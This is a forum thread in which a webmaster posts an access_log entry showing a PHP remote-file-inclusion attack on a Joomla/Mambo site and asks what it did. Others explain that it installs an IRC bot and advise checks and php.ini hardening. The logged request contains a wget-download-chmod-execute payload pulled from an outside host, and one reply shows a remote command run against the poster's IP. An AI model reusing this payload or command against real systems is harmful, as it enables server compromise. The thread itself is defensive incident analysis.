access_log compromise ??
I saw a similar post yesterday, only one of my entries had a 200 status.
Can anyone tell me what they were able to accomplish, or what I need to look for? 24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]= com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http://81.174.26.111/cmd.gif?&cmd= cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" |
They are trying to exploit PHP code, and install an IRC bot, disable global variables and turn the safe_mode on in php.ini.
|
Also, look through ps and netstat output, if you were compromize the listen process will show up in your ps. Look in /tmp and see if listen binary is there. Remeber, if your webserver is running by root, the exploiter owns your system, and could've installed rootkits, etc to hide his presense - the only remedy is to unplug your system from the network, and analyze it, and most probably clean re-install.
|
The webserver is running under the apache id. And the only thing in /tmp is:
keyring-1TvKkp mapping-root |
Code:
nic0@nic0:~$ ./aw 24.70.88.18 * "ps -ef|grep httpd" 3 l337 hax0rs should make sure they're computer is secure first. ;) |
Holy smokes. How do I make sure that can't be done to my machine?
Also, what will disabling global variables and turning safe mode on do? |
Disabling global variables disables people from entering their own variables into a request.
General - turning it off increases security a lot. PHP Safe mode disables a lot of functions that remote users could exploit. |
So in /etc/php.ini if I have:
register_globals = Off safe_mode = On Then this should help a bit? |
Yep - this will improve your PHP security a lot. I also recommend getting a security scanner and checking for common vulnerabilities.. Something like Nessus or Amap.
|
All times are GMT -5. The time now is 09:34 PM. |